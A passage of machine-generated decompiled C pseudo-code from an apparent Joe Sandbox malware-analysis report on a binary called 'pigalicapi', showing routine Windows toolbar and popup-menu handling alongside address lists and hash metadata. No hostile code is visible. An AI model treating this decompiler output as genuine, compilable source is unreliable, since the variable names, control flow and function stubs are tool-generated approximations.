                                                                                                                                                                                                                                                                                          				struct HMENU__* _v268;
                                                                                                                                                                                                                                                                                          				int _v272;
                                                                                                                                                                                                                                                                                          				struct HMENU__** _v276;
                                                                                                                                                                                                                                                                                          				long _v280;
                                                                                                                                                                                                                                                                                          				struct HMENU__* _v284;
                                                                                                                                                                                                                                                                                          				int _v288;
                                                                                                                                                                                                                                                                                          				CHAR* _v292;
                                                                                                                                                                                                                                                                                          				int _v296;
                                                                                                                                                                                                                                                                                          				int _v300;
                                                                                                                                                                                                                                                                                          				int _v304;
                                                                                                                                                                                                                                                                                          				int _v308;
                                                                                                                                                                                                                                                                                          				int _v312;
                                                                                                                                                                                                                                                                                          				void* _v316;
                                                                                                                                                                                                                                                                                          				struct tagMENUITEMINFOA _v364;
                                                                                                                                                                                                                                                                                          				struct HWND__* _v412;
                                                                                                                                                                                                                                                                                          				char _v440;
                                                                                                                                                                                                                                                                                          				char _v444;
                                                                                                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                                                                                          				signed int _t93;
                                                                                                                                                                                                                                                                                          				struct HWND__** _t97;
                                                                                                                                                                                                                                                                                          				long _t100;
                                                                                                                                                                                                                                                                                          				long _t103;
                                                                                                                                                                                                                                                                                          				struct HMENU__* _t104;
                                                                                                                                                                                                                                                                                          				signed char _t117;
                                                                                                                                                                                                                                                                                          				int _t124;
                                                                                                                                                                                                                                                                                          				signed char _t139;
                                                                                                                                                                                                                                                                                          				long _t143;
                                                                                                                                                                                                                                                                                          				void* _t152;
                                                                                                                                                                                                                                                                                          				struct HWND__* _t168;
                                                                                                                                                                                                                                                                                          				struct HMENU__* _t169;
                                                                                                                                                                                                                                                                                          				int _t170;
                                                                                                                                                                                                                                                                                          				CHAR* _t171;
                                                                                                                                                                                                                                                                                          				signed int _t172;
                                                                                                                                                                                                                                                                                          				void* _t173;
                                                                                                                                                                                                                                                                                          				void* _t174;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t93 =  *0x869060; // 0xda7e2511
                                                                                                                                                                                                                                                                                          				_v8 = _t93 ^ _t172;
                                                                                                                                                                                                                                                                                          				_t169 = __ecx;
                                                                                                                                                                                                                                                                                          				_v276 = __ecx;
                                                                                                                                                                                                                                                                                          				_v444 = 0x50;
                                                                                                                                                                                                                                                                                          				E00816820( &_v440, 0, 0x4c);
                                                                                                                                                                                                                                                                                          				_t97 =  *(_t169 + 4);
                                                                                                                                                                                                                                                                                          				_t139 = SendMessageA;
                                                                                                                                                                                                                                                                                          				_t174 = _t173 + 0xc;
                                                                                                                                                                                                                                                                                          				_v440 = 0x10;
                                                                                                                                                                                                                                                                                          				_t161 = _t97[3];
                                                                                                                                                                                                                                                                                          				_t143 =  &_v444;
                                                                                                                                                                                                                                                                                          				SendMessageA( *_t97, 0x41d, _t97[3], _t143);
                                                                                                                                                                                                                                                                                          				_t168 = _v412;
                                                                                                                                                                                                                                                                                          				_t100 = SendMessageA(_t168, 0x418, 0, 0);
                                                                                                                                                                                                                                                                                          				_v280 = _t100;
                                                                                                                                                                                                                                                                                          				if(_t100 <= 0) {
                                                                                                                                                                                                                                                                                          					L26:
                                                                                                                                                                                                                                                                                          					return E008159E6(0, _t139, _v8 ^ _t172, _t161, _t168, _t169);
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					_t103 = SendMessageA(_t168, 0x52e, 0, 0);
                                                                                                                                                                                                                                                                                          					_v284 = _t103;
                                                                                                                                                                                                                                                                                          					 *((char*)(_t169 + 8)) = _t143 & 0xffffff00 | _t103 != 0x00000000;
                                                                                                                                                                                                                                                                                          					_t104 = CreatePopupMenu();
                                                                                                                                                                                                                                                                                          					_t161 =  &_v264;
                                                                                                                                                                                                                                                                                          					_v268 = _t104;
                                                                                                                                                                                                                                                                                          					_t170 = 0;
                                                                                                                                                                                                                                                                                          					_v264.left = 0;
                                                                                                                                                                                                                                                                                          					_v264.top = 0;
                                                                                                                                                                                                                                                                                          					_v264.right = 0;
                                                                                                                                                                                                                                                                                          					_v264.bottom = 0;
                                                                                                                                                                                                                                                                                          					GetClientRect(_t168,  &_v264);
                                                                                                                                                                                                                                                                                          					_v272 = 0;
                                                                                                                                                                                                                                                                                          					if(_v280 > 0) {
                                                                                                                                                                                                                                                                                          						while(1) {
                                                                                                                                                                                                                                                                                          							_v232 = 0;
                                                                                                                                                                                                                                                                                          							_v228 = 0;
                                                                                                                                                                                                                                                                                          							_v224 = 0;
                                                                                                                                                                                                                                                                                          							_v220 = 0;
                                                                                                                                                                                                                                                                                          							_v216 = 0;
                                                                                                                                                                                                                                                                                          							SendMessageA(_t168, 0x417, _t170,  &_v232);
                                                                                                                                                                                                                                                                                          							if((_v224 & 0x00000008) != 0) {
                                                                                                                                                                                                                                                                                          								goto L21;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							_v248 = 0;
                                                                                                                                                                                                                                                                                          							_v244 = 0;
                                                                                                                                                                                                                                                                                          							_v240 = 0;
                                                                                                                                                                                                                                                                                          							_v236 = 0;
                                                                                                                                                                                                                                                                                          							SendMessageA(_t168, 0x41d, _t170,  &_v248);
                                                                                                                                                                                                                                                                                          							_t117 = _v224;
                                                                                                                                                                                                                                                                                          							_t161 = _v240;
                                                                                                                                                                                                                                                                                          							_t139 = _t117 >> 0x00000002 & 0x00000001;
                                                                                                                                                                                                                                                                                          							if(_v240 > _v264.right) {
                                                                                                                                                                                                                                                                                          								if((_t117 & 0x00000001) == 0) {
                                                                                                                                                                                                                                                                                          									_push(0xc7);
                                                                                                                                                                                                                                                                                          									_push(0);
                                                                                                                                                                                                                                                                                          									_v212 = 0;
                                                                                                                                                                                                                                                                                          									_push( &_v211);
                                                                                                                                                                                                                                                                                          									if(_v276[2] == 0) {
                                                                                                                                                                                                                                                                                          										E00816820();
                                                                                                                                                                                                                                                                                          										_t174 = _t174 + 0xc;
                                                                                                                                                                                                                                                                                          										_v312 = 0;
                                                                                                                                                                                                                                                                                          										_v292 = 0;
                                                                                                                                                                                                                                                                                          										_v288 = 0;
                                                                                                                                                                                                                                                                                          										_v308 = 0;
                                                                                                                                                                                                                                                                                          										_v304 = 0;
                                                                                                                                                                                                                                                                                          										_v300 = 0;
                                                                                                                                                                                                                                                                                          										_v296 = 0;
                                                                                                                                                                                                                                                                                          										_t171 =  &_v212;
                                                                                                                                                                                                                                                                                          										_v316 = 0x20;
                                                                                                                                                                                                                                                                                          										_v312 = 2;
                                                                                                                                                                                                                                                                                          										_v292 = _t171;
                                                                                                                                                                                                                                                                                          										_v288 = 0xc8;
                                                                                                                                                                                                                                                                                          										if(SendMessageA(_t168, 0x441, _v228,  &_v316) == 0xffffffff || lstrlenA(_t171) == 0) {
                                                                                                                                                                                                                                                                                          											_t171 = 0x82293e;
                                                                                                                                                                                                                                                                                          											_t124 = LoadStringA( *0x880c0c, _v228,  &_v212, 0xc8);
                                                                                                                                                                                                                                                                                          											_t152 = 0;
                                                                                                                                                                                                                                                                                          											if(_t124 > 0) {
                                                                                                                                                                                                                                                                                          												while( *((char*)(_t172 + _t152 - 0xd0)) != 0xa) {
                                                                                                                                                                                                                                                                                          													_t152 = _t152 + 1;
                                                                                                                                                                                                                                                                                          													if(_t152 < _t124) {
                                                                                                                                                                                                                                                                                          														continue;
                                                                                                                                                                                                                                                                                          													} else {
                                                                                                                                                                                                                                                                                          													}
                                                                                                                                                                                                                                                                                          													goto L20;
                                                                                                                                                                                                                                                                                          												}
                                                                                                                                                                                                                                                                                          												_t171 = _t172 + _t152 - 0xcf;
                                                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          										L20:
                                                                                                                                                                                                                                                                                          										_t161 = _v228;
                                                                                                                                                                                                                                                                                          										AppendMenuA(_v268, 0 | _t139 == 0x00000000, _v228, _t171);
                                                                                                                                                                                                                                                                                          										_t170 = _v272;
                                                                                                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                                                                                                          										E00816820();
                                                                                                                                                                                                                                                                                          										E00816820( &_v364, 0, 0x30);
                                                                                                                                                                                                                                                                                          										_t174 = _t174 + 0x18;
                                                                                                                                                                                                                                                                                          										_v364.cbSize = 0x30;
                                                                                                                                                                                                                                                                                          										if(E00804890(_t139, _t168, _t170) != 0) {
                                                                                                                                                                                                                                                                                          											_v364.cbSize = 0x2c;
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          										_v364.fMask = 0x14;
                                                                                                                                                                                                                                                                                          										_v364.dwTypeData =  &_v212;
                                                                                                                                                                                                                                                                                          										_v364.cch = 0xc8;
                                                                                                                                                                                                                                                                                          										GetMenuItemInfoA(_v284, _t170, 1,  &_v364);
                                                                                                                                                                                                                                                                                          										_t161 = _v268;
                                                                                                                                                                                                                                                                                          										AppendMenuA(_v268, 0 | _t139 == 0x00000000 | 0x00000010, _v364.hSubMenu, _v364.dwTypeData);
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									if(GetMenuItemCount(_v268) > 0) {
                                                                                                                                                                                                                                                                                          										AppendMenuA(_v268, 0x800, 0, 0);
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							L21:
                                                                                                                                                                                                                                                                                          							_t170 = _t170 + 1;
                                                                                                                                                                                                                                                                                          							_v272 = _t170;
                                                                                                                                                                                                                                                                                          							if(_t170 < _v280) {
                                                                                                                                                                                                                                                                                          								_t139 = SendMessageA;
                                                                                                                                                                                                                                                                                          								continue;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							goto L22;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					L22:
                                                                                                                                                                                                                                                                                          					_t169 = _v268;
                                                                                                                                                                                                                                                                                          					if(GetMenuItemCount(_t169) != 0) {
                                                                                                                                                                                                                                                                                          						 *_v276 = _t169;
                                                                                                                                                                                                                                                                                          						return E008159E6(1, _t139, _v8 ^ _t172, _v276, _t168, _t169);
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						if(_t169 != 0) {
                                                                                                                                                                                                                                                                                          							DestroyMenu(_t169);
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						MessageBeep(0xffffffff);
                                                                                                                                                                                                                                                                                          						goto L26;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}





















































                                                                                                                                                                                                                                                                                          0x00810069
                                                                                                                                                                                                                                                                                          0x00810070
                                                                                                                                                                                                                                                                                          0x0081007e
                                                                                                                                                                                                                                                                                          0x00810083
                                                                                                                                                                                                                                                                                          0x00810089
                                                                                                                                                                                                                                                                                          0x00810093
                                                                                                                                                                                                                                                                                          0x00810098
                                                                                                                                                                                                                                                                                          0x0081009b
                                                                                                                                                                                                                                                                                          0x008100a1
                                                                                                                                                                                                                                                                                          0x008100a4
                                                                                                                                                                                                                                                                                          0x008100ae
                                                                                                                                                                                                                                                                                          0x008100b3
                                                                                                                                                                                                                                                                                          0x008100c1
                                                                                                                                                                                                                                                                                          0x008100c3
                                                                                                                                                                                                                                                                                          0x008100d3
                                                                                                                                                                                                                                                                                          0x008100d5
                                                                                                                                                                                                                                                                                          0x008100dd
                                                                                                                                                                                                                                                                                          0x008103f7
                                                                                                                                                                                                                                                                                          0x00810409
                                                                                                                                                                                                                                                                                          0x008100e3
                                                                                                                                                                                                                                                                                          0x008100ed
                                                                                                                                                                                                                                                                                          0x008100f4
                                                                                                                                                                                                                                                                                          0x008100fa
                                                                                                                                                                                                                                                                                          0x008100fd
                                                                                                                                                                                                                                                                                          0x00810103
                                                                                                                                                                                                                                                                                          0x00810109
                                                                                                                                                                                                                                                                                          0x00810112
                                                                                                                                                                                                                                                                                          0x00810115
                                                                                                                                                                                                                                                                                          0x0081011b
                                                                                                                                                                                                                                                                                          0x00810121
                                                                                                                                                                                                                                                                                          0x00810127
                                                                                                                                                                                                                                                                                          0x0081012d
                                                                                                                                                                                                                                                                                          0x00810133
                                                                                                                                                                                                                                                                                          0x0081013f
                                                                                                                                                                                                                                                                                          0x00810156
                                                                                                                                                                                                                                                                                          0x00810158
                                                                                                                                                                                                                                                                                          0x0081015e
                                                                                                                                                                                                                                                                                          0x00810164
                                                                                                                                                                                                                                                                                          0x0081016a
                                                                                                                                                                                                                                                                                          0x00810170
                                                                                                                                                                                                                                                                                          0x00810184
                                                                                                                                                                                                                                                                                          0x0081018d
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x008101a3
                                                                                                                                                                                                                                                                                          0x008101a9
                                                                                                                                                                                                                                                                                          0x008101af
                                                                                                                                                                                                                                                                                          0x008101b5
                                                                                                                                                                                                                                                                                          0x008101bb
                                                                                                                                                                                                                                                                                          0x008101bd
                                                                                                                                                                                                                                                                                          0x008101c3
                                                                                                                                                                                                                                                                                          0x008101ce
                                                                                                                                                                                                                                                                                          0x008101d7
                                                                                                                                                                                                                                                                                          0x008101e0
                                                                                                                                                                                                                                                                                          0x0081021c
                                                                                                                                                                                                                                                                                          0x00810227
                                                                                                                                                                                                                                                                                          0x00810229
                                                                                                                                                                                                                                                                                          0x00810230
                                                                                                                                                                                                                                                                                          0x00810231
                                                                                                                                                                                                                                                                                          0x008102ce
                                                                                                                                                                                                                                                                                          0x008102d5
                                                                                                                                                                                                                                                                                          0x008102d8
                                                                                                                                                                                                                                                                                          0x008102de
                                                                                                                                                                                                                                                                                          0x008102e4
                                                                                                                                                                                                                                                                                          0x008102f1
                                                                                                                                                                                                                                                                                          0x008102f7
                                                                                                                                                                                                                                                                                          0x008102fd
                                                                                                                                                                                                                                                                                          0x00810303
                                                                                                                                                                                                                                                                                          0x00810310
                                                                                                                                                                                                                                                                                          0x0081031e
                                                                                                                                                                                                                                                                                          0x00810328
                                                                                                                                                                                                                                                                                          0x00810332
                                                                                                                                                                                                                                                                                          0x00810338
                                                                                                                                                                                                                                                                                          0x0081034b
                                                                                                                                                                                                                                                                                          0x00810374
                                                                                                                                                                                                                                                                                          0x00810379
                                                                                                                                                                                                                                                                                          0x0081037f
                                                                                                                                                                                                                                                                                          0x00810383
                                                                                                                                                                                                                                                                                          0x00810385
                                                                                                                                                                                                                                                                                          0x0081038f
                                                                                                                                                                                                                                                                                          0x00810392
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00810394
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00810392
                                                                                                                                                                                                                                                                                          0x00810396
                                                                                                                                                                                                                                                                                          0x00810396
                                                                                                                                                                                                                                                                                          0x00810383
                                                                                                                                                                                                                                                                                          0x0081039d
                                                                                                                                                                                                                                                                                          0x0081039d
                                                                                                                                                                                                                                                                                          0x008103b4
                                                                                                                                                                                                                                                                                          0x008103ba
                                                                                                                                                                                                                                                                                          0x00810237
                                                                                                                                                                                                                                                                                          0x00810237
                                                                                                                                                                                                                                                                                          0x00810247
                                                                                                                                                                                                                                                                                          0x0081024c
                                                                                                                                                                                                                                                                                          0x0081024f
                                                                                                                                                                                                                                                                                          0x00810260
                                                                                                                                                                                                                                                                                          0x00810262
                                                                                                                                                                                                                                                                                          0x00810262
                                                                                                                                                                                                                                                                                          0x00810283
                                                                                                                                                                                                                                                                                          0x0081028d
                                                                                                                                                                                                                                                                                          0x00810293
                                                                                                                                                                                                                                                                                          0x0081029d
                                                                                                                                                                                                                                                                                          0x008102b7
                                                                                                                                                                                                                                                                                          0x008102c3
                                                                                                                                                                                                                                                                                          0x008102c3
                                                                                                                                                                                                                                                                                          0x008101e2
                                                                                                                                                                                                                                                                                          0x008101f1
                                                                                                                                                                                                                                                                                          0x00810207
                                                                                                                                                                                                                                                                                          0x00810207
                                                                                                                                                                                                                                                                                          0x008101f1
                                                                                                                                                                                                                                                                                          0x008101e0
                                                                                                                                                                                                                                                                                          0x008103c0
                                                                                                                                                                                                                                                                                          0x008103c0
                                                                                                                                                                                                                                                                                          0x008103c1
                                                                                                                                                                                                                                                                                          0x008103cd
                                                                                                                                                                                                                                                                                          0x00810150
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00810150
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x008103cd
                                                                                                                                                                                                                                                                                          0x00810156
                                                                                                                                                                                                                                                                                          0x008103d3
                                                                                                                                                                                                                                                                                          0x008103d3
                                                                                                                                                                                                                                                                                          0x008103e2
                                                                                                                                                                                                                                                                                          0x00810414
                                                                                                                                                                                                                                                                                          0x00810424
                                                                                                                                                                                                                                                                                          0x008103e4
                                                                                                                                                                                                                                                                                          0x008103e6
                                                                                                                                                                                                                                                                                          0x008103e9
                                                                                                                                                                                                                                                                                          0x008103e9
                                                                                                                                                                                                                                                                                          0x008103f1
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x008103f1
                                                                                                                                                                                                                                                                                          0x008103e2

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.711552533.0000000000801000.00000020.00000001.01000000.00000006.sdmp, Offset: 00800000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.711459674.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000820000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712946985.0000000000869000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713011724.000000000086C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713140868.0000000000880000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713182892.0000000000883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_800000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Menu$Message$Send$Item_memset$AppendCount$BeepClientCreateDestroyInfoPopupRect
                                                                                                                                                                                                                                                                                          • String ID: $,$P
                                                                                                                                                                                                                                                                                          • API String ID: 23422806-2204626854
                                                                                                                                                                                                                                                                                          • Opcode ID: b6363e39d88e5f5b10b3e255721829d65f442f74444381445e9990601722946f
                                                                                                                                                                                                                                                                                          • Instruction ID: 3d8a17a07b6c06aa4d118d77c598b14a4e00b1ecb13c9235ec106cafd57f5191
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b6363e39d88e5f5b10b3e255721829d65f442f74444381445e9990601722946f
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 96A119B09012289BDB64DB64DC89BDEB7B8FF49700F1081DAA549E7281D7B05EC5CF91
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 97%
                                                                                                                                                                                                                                                                                          			E0080E8C0(void* __ecx, struct HMENU__* __edx, signed char _a4, int _a8) {
                                                                                                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                                                                                                          				char _v116;
                                                                                                                                                                                                                                                                                          				intOrPtr _v120;
                                                                                                                                                                                                                                                                                          				intOrPtr _v124;
                                                                                                                                                                                                                                                                                          				intOrPtr _v128;
                                                                                                                                                                                                                                                                                          				void* _v132;
                                                                                                                                                                                                                                                                                          				struct tagRECT _v148;
                                                                                                                                                                                                                                                                                          				intOrPtr _v152;
                                                                                                                                                                                                                                                                                          				intOrPtr _v156;
                                                                                                                                                                                                                                                                                          				signed char _v160;
                                                                                                                                                                                                                                                                                          				intOrPtr _v164;
                                                                                                                                                                                                                                                                                          				void* _v168;
                                                                                                                                                                                                                                                                                          				struct _OSVERSIONINFOA _v324;
                                                                                                                                                                                                                                                                                          				char _v325;
                                                                                                                                                                                                                                                                                          				void* _v332;
                                                                                                                                                                                                                                                                                          				long _v336;
                                                                                                                                                                                                                                                                                          				signed int _v340;
                                                                                                                                                                                                                                                                                          				int _v344;
                                                                                                                                                                                                                                                                                          				int _v348;
                                                                                                                                                                                                                                                                                          				struct HMENU__* _v352;
                                                                                                                                                                                                                                                                                          				CHAR* _v356;
                                                                                                                                                                                                                                                                                          				struct tagMENUITEMINFOA _v404;
                                                                                                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                                                                                          				signed int _t92;
                                                                                                                                                                                                                                                                                          				signed char _t95;
                                                                                                                                                                                                                                                                                          				long _t97;
                                                                                                                                                                                                                                                                                          				signed char _t110;
                                                                                                                                                                                                                                                                                          				signed char _t112;
                                                                                                                                                                                                                                                                                          				int _t125;
                                                                                                                                                                                                                                                                                          				intOrPtr* _t139;
                                                                                                                                                                                                                                                                                          				CHAR* _t140;
                                                                                                                                                                                                                                                                                          				char _t144;
                                                                                                                                                                                                                                                                                          				int _t145;
                                                                                                                                                                                                                                                                                          				int _t147;
                                                                                                                                                                                                                                                                                          				char _t159;
                                                                                                                                                                                                                                                                                          				struct HMENU__* _t167;
                                                                                                                                                                                                                                                                                          				void* _t169;
                                                                                                                                                                                                                                                                                          				signed short _t170;
                                                                                                                                                                                                                                                                                          				void* _t172;
                                                                                                                                                                                                                                                                                          				signed int _t173;
                                                                                                                                                                                                                                                                                          				void* _t174;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t92 =  *0x869060; // 0xda7e2511
                                                                                                                                                                                                                                                                                          				_v8 = _t92 ^ _t173;
                                                                                                                                                                                                                                                                                          				_t145 = _a8;
                                                                                                                                                                                                                                                                                          				_t172 = __ecx;
                                                                                                                                                                                                                                                                                          				_t147 = _a4;
                                                                                                                                                                                                                                                                                          				 *_t145 = 1;
                                                                                                                                                                                                                                                                                          				_t95 =  *(__ecx + 0x84) & 0x00000001;
                                                                                                                                                                                                                                                                                          				_t167 = __edx;
                                                                                                                                                                                                                                                                                          				_v352 = __edx;
                                                                                                                                                                                                                                                                                          				_v348 = _t145;
                                                                                                                                                                                                                                                                                          				if(_t95 == 0) {
                                                                                                                                                                                                                                                                                          					L2:
                                                                                                                                                                                                                                                                                          					_v336 = 0x10001;
                                                                                                                                                                                                                                                                                          					L3:
                                                                                                                                                                                                                                                                                          					if(_t95 == 0) {
                                                                                                                                                                                                                                                                                          						L34:
                                                                                                                                                                                                                                                                                          						_t162 =  *(_t172 + 4);
                                                                                                                                                                                                                                                                                          						_v332 = 0;
                                                                                                                                                                                                                                                                                          						_t97 = SendMessageA( *(_t172 + 4), 0x44e, _t147,  &_v332);
                                                                                                                                                                                                                                                                                          						if(_t97 != 0) {
                                                                                                                                                                                                                                                                                          							if(IsWindowEnabled( *(_t172 + 0x5c)) != 0) {
                                                                                                                                                                                                                                                                                          								_v148.top = 0;
                                                                                                                                                                                                                                                                                          								_v148.right = 0;
                                                                                                                                                                                                                                                                                          								_v148.bottom = 0;
                                                                                                                                                                                                                                                                                          								_t145 = 0;
                                                                                                                                                                                                                                                                                          								_v148.left = 0;
                                                                                                                                                                                                                                                                                          								GetClientRect( *(_t172 + 4),  &_v148);
                                                                                                                                                                                                                                                                                          								_v128 = 0;
                                                                                                                                                                                                                                                                                          								_v124 = 0;
                                                                                                                                                                                                                                                                                          								_v120 = 0;
                                                                                                                                                                                                                                                                                          								_v132 = 0;
                                                                                                                                                                                                                                                                                          								SendMessageA( *(_t172 + 4), 0x41d, _v332,  &_v132);
                                                                                                                                                                                                                                                                                          								_t162 = _v332;
                                                                                                                                                                                                                                                                                          								_v164 = 0;
                                                                                                                                                                                                                                                                                          								_v160 = 0;
                                                                                                                                                                                                                                                                                          								_v156 = 0;
                                                                                                                                                                                                                                                                                          								_v152 = 0;
                                                                                                                                                                                                                                                                                          								_v168 = 0;
                                                                                                                                                                                                                                                                                          								SendMessageA( *(_t172 + 4), 0x417, _v332,  &_v168);
                                                                                                                                                                                                                                                                                          								_t110 = _v160;
                                                                                                                                                                                                                                                                                          								if((_t110 & 0x00000004) == 0 || (_t110 & 0x00000008) != 0 || _v124 > _v148.right) {
                                                                                                                                                                                                                                                                                          									MessageBeep(_t145);
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									_t112 =  *(_t172 + 0x85);
                                                                                                                                                                                                                                                                                          									if((_t112 & 0x00000002) != 0 && (_t112 & 0x00000004) == 0) {
                                                                                                                                                                                                                                                                                          										 *(_t172 + 0x85) = _t112 | 0x00000008;
                                                                                                                                                                                                                                                                                          										E00811600(1, _t172);
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          									E00811540(_t172);
                                                                                                                                                                                                                                                                                          									_t162 =  *(_t172 + 4);
                                                                                                                                                                                                                                                                                          									PostMessageA( *(_t172 + 4), 0x100, 0x28, _t145);
                                                                                                                                                                                                                                                                                          									SendMessageA( *(_t172 + 4), 0x448, _v332, _t145);
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							 *_t145 = _t97;
                                                                                                                                                                                                                                                                                          							PostMessageA( *(_t172 + 4), 0x448, 0xffffffff, _t97);
                                                                                                                                                                                                                                                                                          							E00811570(_t172, SendMessageA);
                                                                                                                                                                                                                                                                                          							if(_a4 == 0x2f && E00811120(_t172) != 0) {
                                                                                                                                                                                                                                                                                          								 *_t145 = 1;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						L47:
                                                                                                                                                                                                                                                                                          						_pop(_t169);
                                                                                                                                                                                                                                                                                          						return E008159E6(_v336, _t145, _v8 ^ _t173, _t162, _t169, _t172);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_t162 = _t147 >> 0x10;
                                                                                                                                                                                                                                                                                          					if(_t147 >> 0x10 != 0x10) {
                                                                                                                                                                                                                                                                                          						if(_t95 != 0) {
                                                                                                                                                                                                                                                                                          							goto L47;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						goto L34;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_t125 = GetMenuItemCount(_t167);
                                                                                                                                                                                                                                                                                          					_t145 = 0;
                                                                                                                                                                                                                                                                                          					_v344 = _t125;
                                                                                                                                                                                                                                                                                          					_v332 = 2;
                                                                                                                                                                                                                                                                                          					_v340 = 0;
                                                                                                                                                                                                                                                                                          					_v325 = 0;
                                                                                                                                                                                                                                                                                          					if(_t125 <= 0) {
                                                                                                                                                                                                                                                                                          						goto L47;
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						goto L8;
                                                                                                                                                                                                                                                                                          						L9:
                                                                                                                                                                                                                                                                                          						_t144 = _v324.dwMajorVersion;
                                                                                                                                                                                                                                                                                          						if(_t144 >= 5 || _t144 == 4 && _v324.dwMinorVersion >= 0x5a) {
                                                                                                                                                                                                                                                                                          							L13:
                                                                                                                                                                                                                                                                                          							_v404.cch = 0x64;
                                                                                                                                                                                                                                                                                          							_v404.fMask = 0x3f;
                                                                                                                                                                                                                                                                                          							_v404.dwTypeData =  &_v116;
                                                                                                                                                                                                                                                                                          							if(GetMenuItemInfoA(_t167, _t145, 1,  &_v404) == 0 || (_v404.fType & 0x00000800) != 0) {
                                                                                                                                                                                                                                                                                          								L26:
                                                                                                                                                                                                                                                                                          								_t145 = _t145 + 1;
                                                                                                                                                                                                                                                                                          								if(_t145 < _v344) {
                                                                                                                                                                                                                                                                                          									_t167 = _v352;
                                                                                                                                                                                                                                                                                          									L8:
                                                                                                                                                                                                                                                                                          									E00816820( &_v404, 0, 0x30);
                                                                                                                                                                                                                                                                                          									_v404.cbSize = 0x30;
                                                                                                                                                                                                                                                                                          									E00816820( &(_v324.dwMajorVersion), 0, 0x90);
                                                                                                                                                                                                                                                                                          									_t174 = _t174 + 0x18;
                                                                                                                                                                                                                                                                                          									_t162 =  &_v324;
                                                                                                                                                                                                                                                                                          									_v324.dwOSVersionInfoSize = 0x94;
                                                                                                                                                                                                                                                                                          									if(GetVersionExA( &_v324) == 0) {
                                                                                                                                                                                                                                                                                          										goto L12;
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          									goto L9;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								goto L29;
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								_t139 = _v404.dwItemData;
                                                                                                                                                                                                                                                                                          								if(_t139 == 0 ||  *_t139 != 0x1313) {
                                                                                                                                                                                                                                                                                          									goto L26;
                                                                                                                                                                                                                                                                                          								} else {
